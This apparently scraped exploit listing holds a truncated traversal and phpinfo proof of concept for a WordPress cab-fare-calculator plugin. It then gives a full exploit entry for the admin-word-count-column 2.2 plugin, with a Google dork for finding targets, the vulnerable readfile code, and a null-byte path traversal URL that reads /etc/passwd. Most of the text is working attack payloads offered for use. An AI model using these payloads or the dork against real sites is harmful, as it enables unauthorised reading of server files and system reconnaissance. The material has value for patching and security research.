http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php echo "Local file read"; phpinfo(); ?>
HireHackking 
# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
# Version: 2.2
# Contact me: h [at] spidersilk.com

# PHP version: 5.3.2 or below

# Vulnerable File: plugins/admin-word-count-column/download-csv.php

# Vulnerable Code:

```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```

# Proof of Concept:

localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0

Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.